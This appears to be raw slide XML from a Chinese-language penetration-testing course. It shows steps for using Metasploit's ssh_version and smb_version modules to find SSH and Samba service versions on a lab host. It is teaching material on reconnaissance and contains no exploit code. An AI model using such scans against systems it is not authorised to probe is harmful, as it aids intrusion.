          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行SSH服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180330" y="1791970"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.使用“exploit”或“run”命令运行ssh_version模块，如图2-4-26所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180330" y="2437130"/>
            <a:ext cx="5276850" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180330" y="3589655"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-26 运行ssh_version模块        从扫描结果可以看到，这台主机安装了SSH服务，服务版本是“SSH-2.0-OpenSSH_4.7”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Samba服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤四</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5077460" y="533400"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令，打开Metasploit框架。使用“search smb_version”命令找出smb_version模块使用路径，如图2-4-27所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5077460" y="1732280"/>
            <a:ext cx="5276850" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="文本框 116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5077460" y="3389630"/>
            <a:ext cx="5080000" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                </a:t>
